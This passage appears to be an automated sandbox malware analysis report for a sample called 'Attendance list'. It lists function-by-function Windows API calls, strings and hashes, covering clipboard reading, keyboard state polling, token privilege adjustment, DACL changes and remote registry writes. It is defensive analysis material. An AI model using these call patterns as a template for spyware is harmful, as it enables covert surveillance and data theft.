                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008FDA8E
                        • IsIconic.USER32(?), ref: 008FDA97
                        • ShowWindow.USER32(?,00000009), ref: 008FDAA4
                        • SetForegroundWindow.USER32(?), ref: 008FDAAE
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008FDAC4
                        • GetCurrentThreadId.KERNEL32 ref: 008FDACB
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 008FDAD7
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008FDAE8
                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 008FDAF0
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 008FDAF8
                        • SetForegroundWindow.USER32(?), ref: 008FDAFB
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB10
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB1B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB25
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB2A
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB33
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB38
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008FDB42
                        • keybd_event.USER32(00000012,00000000), ref: 008FDB47
                        • SetForegroundWindow.USER32(?), ref: 008FDB4A
                        • AttachThreadInput.USER32(?,?,00000000), ref: 008FDB71
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: 8f025f5751f72b71b9f03e0cc0310a4aadd925d5200eec116334412b76660749
                        • Instruction ID: 3c4124c6248f41dca00c93d50cbdc09dec7c1ba40b0f13e2ebcb1ba49fa7dd0d
                        • Opcode Fuzzy Hash: 8f025f5751f72b71b9f03e0cc0310a4aadd925d5200eec116334412b76660749
                        • Instruction Fuzzy Hash: E0318D75A9431CBAEB216FB19C49F7F3E6DEB45B60F114025FB04EA1D0DAB05900BAA0
                        Function 00918858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00918CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00918D0D
                          • Part of subcall function 00918CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00918D3A
                          • Part of subcall function 00918CC3: GetLastError.KERNEL32 ref: 00918D47
                        • _memset.LIBCMT ref: 0091889B
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009188ED
                        • CloseHandle.KERNEL32(?), ref: 009188FE
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00918915
                        • GetProcessWindowStation.USER32 ref: 0091892E
                        • SetProcessWindowStation.USER32(00000000), ref: 00918938
                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00918952
                          • Part of subcall function 00918713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00918851), ref: 00918728
                          • Part of subcall function 00918713: CloseHandle.KERNEL32(?,?,00918851), ref: 0091873A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                        • String ID: $default$winsta0
                        • API String ID: 2063423040-1027155976
                        • Opcode ID: bbf361e5c040ecfc3713623fc594045518d7159a28b86f5a69b152bb6fed2f0d
                        • Instruction ID: 7fc32dce6cbd7ba4ea3e1f1628d76c2db82750ae792bc485f70c455dc4925350
                        • Opcode Fuzzy Hash: bbf361e5c040ecfc3713623fc594045518d7159a28b86f5a69b152bb6fed2f0d
                        • Instruction Fuzzy Hash: D8814875A0020EAFDF11DFA4DC45AEFBBBCEF05305F08416AF910A6161DB358E95AB60
                        Function 0093425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(0094F910), ref: 00934284
                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00934292
                        • GetClipboardData.USER32(0000000D), ref: 0093429A
                        • CloseClipboard.USER32 ref: 009342A6
                        • GlobalLock.KERNEL32(00000000), ref: 009342C2
                        • CloseClipboard.USER32 ref: 009342CC
                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 009342E1
                        • IsClipboardFormatAvailable.USER32(00000001), ref: 009342EE
                        • GetClipboardData.USER32(00000001), ref: 009342F6
                        • GlobalLock.KERNEL32(00000000), ref: 00934303
                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00934337
                        • CloseClipboard.USER32 ref: 00934447
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                        • String ID:
                        • API String ID: 3222323430-0
                        • Opcode ID: 76c7765e8a9ac73760950ed8047b49bdb4cc60596fa353cdbe1da5be66b87b62
                        • Instruction ID: 0faa07a3f8ff3770c7940c8d10366092376110482046268709a1089cbceb6a60
                        • Opcode Fuzzy Hash: 76c7765e8a9ac73760950ed8047b49bdb4cc60596fa353cdbe1da5be66b87b62
                        • Instruction Fuzzy Hash: F8518139208306ABD701AF64EC99F6F77A8EF85B00F014529F566D21A1DF70E9049F62
                        Function 0092C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 0092C9F8
                        • FindClose.KERNEL32(00000000), ref: 0092CA4C
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092CA71
                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0092CA88
                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0092CAAF
                        • __swprintf.LIBCMT ref: 0092CAFB
                        • __swprintf.LIBCMT ref: 0092CB3E
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • __swprintf.LIBCMT ref: 0092CB92
                          • Part of subcall function 008E38D8: __woutput_l.LIBCMT ref: 008E3931
                        • __swprintf.LIBCMT ref: 0092CBE0
                          • Part of subcall function 008E38D8: __flsbuf.LIBCMT ref: 008E3953
                          • Part of subcall function 008E38D8: __flsbuf.LIBCMT ref: 008E396B
                        • __swprintf.LIBCMT ref: 0092CC2F
                        • __swprintf.LIBCMT ref: 0092CC7E
                        • __swprintf.LIBCMT ref: 0092CCCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                        • API String ID: 3953360268-2428617273
                        • Opcode ID: 059e1b69ab18b890f6bee16f216819912029599e2c4b5b3323390d391aa95a30
                        • Instruction ID: 2d45d6f5e4bb619015ef9d181214704b70762c2a28c3f615fadb05abc8a56ed9
                        • Opcode Fuzzy Hash: 059e1b69ab18b890f6bee16f216819912029599e2c4b5b3323390d391aa95a30
                        • Instruction Fuzzy Hash: 0FA11AB2518255ABC700EB69C886EAFB7FCFF95700F40496DF585D2191EA34DA08CB63
                        Function 0092F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0092F221
                        • _wcscmp.LIBCMT ref: 0092F236
                        • _wcscmp.LIBCMT ref: 0092F24D
                        • GetFileAttributesW.KERNEL32(?), ref: 0092F25F
                        • SetFileAttributesW.KERNEL32(?,?), ref: 0092F279
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0092F291
                        • FindClose.KERNEL32(00000000), ref: 0092F29C
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0092F2B8
                        • _wcscmp.LIBCMT ref: 0092F2DF
                        • _wcscmp.LIBCMT ref: 0092F2F6
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092F308
                        • SetCurrentDirectoryW.KERNEL32(0097A5A0), ref: 0092F326
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0092F330
                        • FindClose.KERNEL32(00000000), ref: 0092F33D
                        • FindClose.KERNEL32(00000000), ref: 0092F34F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                        • String ID: *.*
                        • API String ID: 1803514871-438819550
                        • Opcode ID: c6da841cfd05879912de6c18b7e46fe261d9bcd7b5c3134168fc1d278b9502ca
                        • Instruction ID: a1b67e5e3ad36c93103af5be2507e44f9943ee5433d3b347abe55367e2e47211
                        • Opcode Fuzzy Hash: c6da841cfd05879912de6c18b7e46fe261d9bcd7b5c3134168fc1d278b9502ca
                        • Instruction Fuzzy Hash: 1B31B37650022A6ADF10DBB4EC69EDE77BCAF4A3A5F104175E814D3090EB70DE459B60
                        Function 00940AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940BDE
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0094F910,00000000,?,00000000,?,?), ref: 00940C4C
                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00940C94
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00940D1D
                        • RegCloseKey.ADVAPI32(?), ref: 0094103D
                        • RegCloseKey.ADVAPI32(00000000), ref: 0094104A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Close$ConnectCreateRegistryValue
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 536824911-966354055
                        • Opcode ID: 18822396d8fd4952b275267a725c1a847afd85e1d93bbb774004ef50a89c0add
                        • Instruction ID: a17d8e4aa197401fe95ecf11c71fd8d1412ef4e7858344d95d7b5e0023af30e0
                        • Opcode Fuzzy Hash: 18822396d8fd4952b275267a725c1a847afd85e1d93bbb774004ef50a89c0add
                        • Instruction Fuzzy Hash: 42025A752046119FCB14EF19C895E2ABBE5FF89714F05895DF98A9B362CB30EC44CB82
                        Function 0092F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0092F37E
                        • _wcscmp.LIBCMT ref: 0092F393
                        • _wcscmp.LIBCMT ref: 0092F3AA
                          • Part of subcall function 009245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009245DC
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0092F3D9
                        • FindClose.KERNEL32(00000000), ref: 0092F3E4
                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0092F400
                        • _wcscmp.LIBCMT ref: 0092F427
                        • _wcscmp.LIBCMT ref: 0092F43E
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0092F450
                        • SetCurrentDirectoryW.KERNEL32(0097A5A0), ref: 0092F46E
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0092F478
                        • FindClose.KERNEL32(00000000), ref: 0092F485
                        • FindClose.KERNEL32(00000000), ref: 0092F497
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                        • String ID: *.*
                        • API String ID: 1824444939-438819550
                        • Opcode ID: 9703fffaa10ee12e831beaa0a763cfae4192eeaf3ce746057dc1af846b005525
                        • Instruction ID: d11c91282392c3fd120125c4a5d3de1874185728a291090883c839e2305a214d
                        • Opcode Fuzzy Hash: 9703fffaa10ee12e831beaa0a763cfae4192eeaf3ce746057dc1af846b005525
                        • Instruction Fuzzy Hash: 4A31C27650122A6BDB10AB64FCA8EDE77BC9F4A364F104175E854E30A0DBB0DE44DA60
                        Function 009181F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00918766
                          • Part of subcall function 0091874A: GetLastError.KERNEL32(?,0091822A,?,?,?), ref: 00918770
                          • Part of subcall function 0091874A: GetProcessHeap.KERNEL32(00000008,?,?,0091822A,?,?,?), ref: 0091877F
                          • Part of subcall function 0091874A: HeapAlloc.KERNEL32(00000000,?,0091822A,?,?,?), ref: 00918786
                          • Part of subcall function 0091874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0091879D
                          • Part of subcall function 009187E7: GetProcessHeap.KERNEL32(00000008,00918240,00000000,00000000,?,00918240,?), ref: 009187F3
                          • Part of subcall function 009187E7: HeapAlloc.KERNEL32(00000000,?,00918240,?), ref: 009187FA
                          • Part of subcall function 009187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00918240,?), ref: 0091880B
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091825B
                        • _memset.LIBCMT ref: 00918270
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091828F
                        • GetLengthSid.ADVAPI32(?), ref: 009182A0
                        • GetAce.ADVAPI32(?,00000000,?), ref: 009182DD
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009182F9
                        • GetLengthSid.ADVAPI32(?), ref: 00918316
                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00918325
                        • HeapAlloc.KERNEL32(00000000), ref: 0091832C
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091834D
                        • CopySid.ADVAPI32(00000000), ref: 00918354
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00918385
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009183AB
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009183BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                        • String ID:
                        • API String ID: 3996160137-0
                        • Opcode ID: 26a4ea6254c4e9dc425a06a0d37c21641c237f10bdc5a3b89f56ac93d75e2dd0
                        • Instruction ID: 2760a8fb5b3b949edcc127defcfc7e4ec64f9d2f07b2043db999b7ea7ef51031
                        • Opcode Fuzzy Hash: 26a4ea6254c4e9dc425a06a0d37c21641c237f10bdc5a3b89f56ac93d75e2dd0
                        • Instruction Fuzzy Hash: 8A617E75A0420AAFDF14DF94DC44EEEBBB9FF44700F04812AF825A7291DB309A41EB60
                        Function 008D6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                        • API String ID: 0-4052911093
                        • Opcode ID: 7a4270e79ecd6486dfceab03de5c277f63d219476516303a547b53310a861ee7
                        • Instruction ID: 2514c8882b92aa307f4d87c2d1bf12ead4065e846283d29ebe4d374759c5dde0
                        • Opcode Fuzzy Hash: 7a4270e79ecd6486dfceab03de5c277f63d219476516303a547b53310a861ee7
                        • Instruction Fuzzy Hash: 70725A75E0021D9ADB24CF58D8807EEB7B5FF48310F14816AE959EB390EB749E81CB91
                        Function 00940665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00940038,?,?), ref: 009410BC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00940737
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009407D6
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0094086E
                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00940AAD
                        • RegCloseKey.ADVAPI32(00000000), ref: 00940ABA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                        • String ID:
                        • API String ID: 1240663315-0
                        • Opcode ID: 4ffd5d46e3f1ac807c8308a57015e4e64a07388fd8824a87bf334817b1896c39
                        • Instruction ID: 14da45031feaf3c8cc56ae74022a7673c786cc4106e5d1f709dd545dbcbba3c2
                        • Opcode Fuzzy Hash: 4ffd5d46e3f1ac807c8308a57015e4e64a07388fd8824a87bf334817b1896c39
                        • Instruction Fuzzy Hash: 75E13F31204211AFCB14DF29C895E6ABBF8FF89714F04896DF589D7262DA30ED45CB52
                        Function 00920219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00920241
                        • GetAsyncKeyState.USER32(000000A0), ref: 009202C2
                        • GetKeyState.USER32(000000A0), ref: 009202DD
                        • GetAsyncKeyState.USER32(000000A1), ref: 009202F7
                        • GetKeyState.USER32(000000A1), ref: 0092030C
                        • GetAsyncKeyState.USER32(00000011), ref: 00920324
                        • GetKeyState.USER32(00000011), ref: 00920336
                        • GetAsyncKeyState.USER32(00000012), ref: 0092034E
                        • GetKeyState.USER32(00000012), ref: 00920360
                        • GetAsyncKeyState.USER32(0000005B), ref: 00920378
                        • GetKeyState.USER32(0000005B), ref: 0092038A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 3e7c72f81dea39ecb9ee603a78862dd37871f9d84cf4536a27d19c29e01c7c5d
                        • Instruction ID: d85626b86280585f0668af900af60a5a5abf3745fbc7095acb325f31e2a8f4a6
                        • Opcode Fuzzy Hash: 3e7c72f81dea39ecb9ee603a78862dd37871f9d84cf4536a27d19c29e01c7c5d
                        • Instruction Fuzzy Hash: EE41EB345087DAAEFF31CA64A8187B5BEA87F92340F08409ED5C6461C7E7A55DC8C7A2
                        Function 009386D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        • CoInitialize.OLE32 ref: 00938718
                        • CoUninitialize.OLE32 ref: 00938723
                        • CoCreateInstance.OLE32(?,00000000,00000017,00952BEC,?), ref: 00938783
                        • IIDFromString.OLE32(?,?), ref: 009387F6
                        • VariantInit.OLEAUT32(?), ref: 00938890
                        • VariantClear.OLEAUT32(?), ref: 009388F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 834269672-1287834457
                        • Opcode ID: ff37c1efe96534435f0ece44ae6c07fccd7a04f4bf6b52e31df3c7315a382d2a
                        • Instruction ID: 65dcca99710e18a6ef4de496327e5b67a5dc028b207a76fa5ea8b0041cd87ea8
                        • Opcode Fuzzy Hash: ff37c1efe96534435f0ece44ae6c07fccd7a04f4bf6b52e31df3c7315a382d2a
                        • Instruction Fuzzy Hash: A6619A71608302AFD710DF24C848F6BBBE9AF89714F10481DF9969B291CB74ED48CB92
                        Function 00934458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
